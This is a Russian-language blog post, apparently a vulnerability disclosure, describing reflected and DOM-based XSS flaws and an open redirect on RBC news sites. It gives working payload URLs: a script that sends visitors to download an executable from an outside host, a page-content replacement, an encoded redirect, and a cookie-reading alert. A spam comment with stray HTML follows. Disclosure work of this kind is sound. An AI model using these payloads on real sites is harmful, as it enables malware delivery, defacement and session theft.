Множественные уязвимости проектов РосБизнесКонсалтинга

- Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /
GET-переменные: нет
Примечание: Уязвимость вызвана отсутствием фильтрации (или кодирования) исходного URL. Работает только во всех версиях Internet Explorer.
Возможные области применения (приведены простые примеры):
- Распространение вредоносного ПО - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.location.replace(’http://fuzzing.ru/%62%6C%6F%67/%66%69%6C%65%73/FirefoxSetup.exe’);</script>
- Подмена содержимого страницы - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.body.innerHTML=’<h1>Fuzzing.ru’</script>
Приведенные примеры очень грубые. Без сомнений можно полагать, что качественная эксплуатация данных уязвимостей является делом техники.
- Тип уязвимости: Переадресация URL.
Приложение: http://redir.rbc.ru/cgi-bin/redirect.cgi
GET-переменные: нет
Возможные области применения (приведены простые примеры):
- Распространение вредоносного ПО - http://redir.rbc.ru/cgi-bin/redirect.cgi?http://%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65
Ну и напоследок, не очень практичная, но тем не менее полноценная…
- Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS) - DOM based. Недостаточная фильтрация содержимого переменной.
Приложение: /
GET-переменные: нет
Причины те же что и у описанной вы?е XSS-уязвимости, но немного другой механизм срабатывания.
Пример: http://top.rbc.ru/incidents/22/10/2008/254898.shtml?’);alert(document.cookie);encodeURIComponent(’
Механизм срабатывания ограничен событием в которое упаковано внедренное содержимое (onclick по ссылке добавления в закладки текущей статьи), либо событием которое можно добавить элементу при внедрении. Однако элемент <a> событий которые можно создать без действий пользователя (к примеру, onload, onerrror) не имеет. Поэтому для просмотра результата надо кликнуть по ссылке добавления “в мемориз”.
One Response to “Множественные уязвимости проектов РосБизнесКонсалтинга”
Оставить комментарий
Вы должны зарегистрироваться, чтобы оставлять комментарии
Октябрь 8th, 2011 at 11:20
“http://en.patriot-cccp.ru/index.php?option=com_content&view=article&id=612&lol= industry@uqzpo2.gentleman“>.< / a >< / strong >< / i >…
сэнкс за инфу :grin:…